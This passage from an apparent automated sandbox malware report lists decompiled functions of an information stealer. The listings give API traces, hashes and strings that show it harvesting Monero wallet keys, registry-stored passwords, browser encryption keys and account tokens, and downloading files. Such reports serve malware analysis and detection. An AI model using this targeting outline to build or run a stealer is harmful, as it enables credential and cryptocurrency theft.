                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 59207f6f1d4cc8cf782338ce894cd51fb6da9b71edb2c73949a0e1f31a647701
                                • Instruction ID: c947811efebcd574545e8557fa3f7b0a602ee49436955ed11d3271447a372e45
                                • Opcode Fuzzy Hash: 59207f6f1d4cc8cf782338ce894cd51fb6da9b71edb2c73949a0e1f31a647701
                                • Instruction Fuzzy Hash: DCC197B59401199BCB14EF60DC89FEE7379FB94304F044598F50AA7142EA70AEC9DF91
                                Function 00C44280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C442EC
                                • lstrcat.KERNEL32(?,019FEB68), ref: 00C4430B
                                • lstrcat.KERNEL32(?,?), ref: 00C4431F
                                • lstrcat.KERNEL32(?,019FD710), ref: 00C44333
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C48D90: GetFileAttributesA.KERNEL32(00000000,?,00C31B54,?,?,00C5564C,?,?,00C50E1F), ref: 00C48D9F
                                  • Part of subcall function 00C39CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C39D39
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                  • Part of subcall function 00C493C0: GlobalAlloc.KERNEL32(00000000,00C443DD,00C443DD), ref: 00C493D3
                                • StrStrA.SHLWAPI(?,019FEC58), ref: 00C443F3
                                • GlobalFree.KERNEL32(?), ref: 00C44512
                                  • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                  • Part of subcall function 00C39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                  • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                  • Part of subcall function 00C39AC0: LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C444A3
                                • StrCmpCA.SHLWAPI(?,00C508D1), ref: 00C444C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C444D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00C444E5
                                • lstrcat.KERNEL32(00000000,00C50FB8), ref: 00C444F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: fcb577e93b406913adf0af6a552d2aadc93eb4d2757540c9e6e998220b146ec6
                                • Instruction ID: 11981d2950816bbfff9d737a14cc3b6e35c6f5f8fdc9bbb3937375e85b18818a
                                • Opcode Fuzzy Hash: fcb577e93b406913adf0af6a552d2aadc93eb4d2757540c9e6e998220b146ec6
                                • Instruction Fuzzy Hash: 0A714976910208ABDB14FBE0DC8AFEE7379BB88300F144598F619A7181DA74DB49DF91
                                Function 00C31310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C312B4
                                  • Part of subcall function 00C312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C312BB
                                  • Part of subcall function 00C312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C312D7
                                  • Part of subcall function 00C312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C312F5
                                  • Part of subcall function 00C312A0: RegCloseKey.ADVAPI32(?), ref: 00C312FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3134F
                                • lstrlen.KERNEL32(?), ref: 00C3135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00C31377
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C31465
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00C314EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 242b84a372e33620fb656bef2fe4f24161b08e584776e7eb570f9dad9ebd2fd9
                                • Instruction ID: ef4a98fda5c8cf0317f077661f7d80d09302db3216ddeb37c736e91a14bfd6b2
                                • Opcode Fuzzy Hash: 242b84a372e33620fb656bef2fe4f24161b08e584776e7eb570f9dad9ebd2fd9
                                • Instruction Fuzzy Hash: 235140B1D501195BDB15FB60DD96FED733CFB54304F4041A8B60AA2082EE706B89DFA6
                                Function 00C375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C372D0: memset.MSVCRT ref: 00C37314
                                  • Part of subcall function 00C372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C3733A
                                  • Part of subcall function 00C372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C373B1
                                  • Part of subcall function 00C372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C3740D
                                  • Part of subcall function 00C372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C37452
                                  • Part of subcall function 00C372D0: HeapFree.KERNEL32(00000000), ref: 00C37459
                                • lstrcat.KERNEL32(00000000,00C517FC), ref: 00C37606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C37648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00C3765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C3768F
                                • lstrcat.KERNEL32(00000000,00C51804), ref: 00C376A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C376D3
                                • lstrcat.KERNEL32(00000000,00C51808), ref: 00C376ED
                                • task.LIBCPMTD ref: 00C376FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: :
                                • API String ID: 3191641157-3653984579
                                • Opcode ID: 677fdfa3b470d61204f2baceefb6cdad8e85f10cb3fd17617b79460da8a5c0a9
                                • Instruction ID: fd1d8de8a0d17569764f0871819d0fe360e7d1cd5d56ec7bff19bcafefe700e0
                                • Opcode Fuzzy Hash: 677fdfa3b470d61204f2baceefb6cdad8e85f10cb3fd17617b79460da8a5c0a9
                                • Instruction Fuzzy Hash: C93150B1910109DFCB18EBE5DC9ADFF7374BB84302F184128F516B7290DA34A98ADB52
                                Function 00C372D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00C37314
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C3733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C373B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C3740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C37452
                                • HeapFree.KERNEL32(00000000), ref: 00C37459
                                • task.LIBCPMTD ref: 00C37555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: Password
                                • API String ID: 2808661185-3434357891
                                • Opcode ID: 9728c9a5ffc86faca335009bca6ce4d049e1857b64864f081d0afe2775fcbdf8
                                • Instruction ID: 756f05378c85ebf78d3230cf521e63f6e00fb8d53770a5fe5f47f8627688b06a
                                • Opcode Fuzzy Hash: 9728c9a5ffc86faca335009bca6ce4d049e1857b64864f081d0afe2775fcbdf8
                                • Instruction Fuzzy Hash: E6614CB591426C9BDB24DB50CC45BDAB7B8BF48300F0481E9E689A6141DFB06FC9DFA1
                                Function 00C48100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,019FE970,00000000,?,00C50E2C,00000000,?,00000000), ref: 00C48130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C48137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C48158
                                • __aulldiv.LIBCMT ref: 00C48172
                                • __aulldiv.LIBCMT ref: 00C48180
                                • wsprintfA.USER32 ref: 00C481AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 9efbcb82c332ea1edb9d289069a7886c1e77ac5c81817d5c1ef1ea3cef47be72
                                • Instruction ID: b26e331c527d6f9934d28da6c6bbf4ce3c8b60836d57779488e19202c3acbed1
                                • Opcode Fuzzy Hash: 9efbcb82c332ea1edb9d289069a7886c1e77ac5c81817d5c1ef1ea3cef47be72
                                • Instruction Fuzzy Hash: 9A214AB1E44208ABDB00DFD5CC49FAEB7B8FB44B00F104219F605BB280C77869058BA5
                                Function 00C360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                  • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                • InternetOpenA.WININET(00C50DF7,00000001,00000000,00000000,00000000), ref: 00C3610F
                                • StrCmpCA.SHLWAPI(?,019FF380), ref: 00C36147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C3618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C361B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00C361DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C3620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00C36249
                                • InternetCloseHandle.WININET(?), ref: 00C36253
                                • InternetCloseHandle.WININET(00000000), ref: 00C36260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 2092ae5410f79a95e8d1959e21641dcf64d7530abc59464741640a31aaa6a88f
                                • Instruction ID: 4eb638dcbab83ef26619851c053c695037dca09495b3b33779b1afb116db84ea
                                • Opcode Fuzzy Hash: 2092ae5410f79a95e8d1959e21641dcf64d7530abc59464741640a31aaa6a88f
                                • Instruction Fuzzy Hash: 40518FB0950208AFEB24DF51DC45BEE77B8FB44301F1080A8E609A71C0DB756A89CF95
                                Function 00C3BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                • lstrlen.KERNEL32(00000000), ref: 00C3BC9F
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C3BCCD
                                • lstrlen.KERNEL32(00000000), ref: 00C3BDA5
                                • lstrlen.KERNEL32(00000000), ref: 00C3BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 7dd8e1aad46adcf93f802b40c801bf3595c9a510896917afc7d12bffa92b0566
                                • Instruction ID: ee958e5fee5be4dec0e7576e7452f46e6ca6b9cf104d9aae9c8d32594da74d03
                                • Opcode Fuzzy Hash: 7dd8e1aad46adcf93f802b40c801bf3595c9a510896917afc7d12bffa92b0566
                                • Instruction Fuzzy Hash: BCB14172950108ABEB14FBA0DD96EEE7338FF54304F444568F506B6092EF346E49DBA2
                                Function 00C46770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: a798eef28ea36acac72eb6263fcc36ecbcc78d658a14db500af3b36bfb92d211
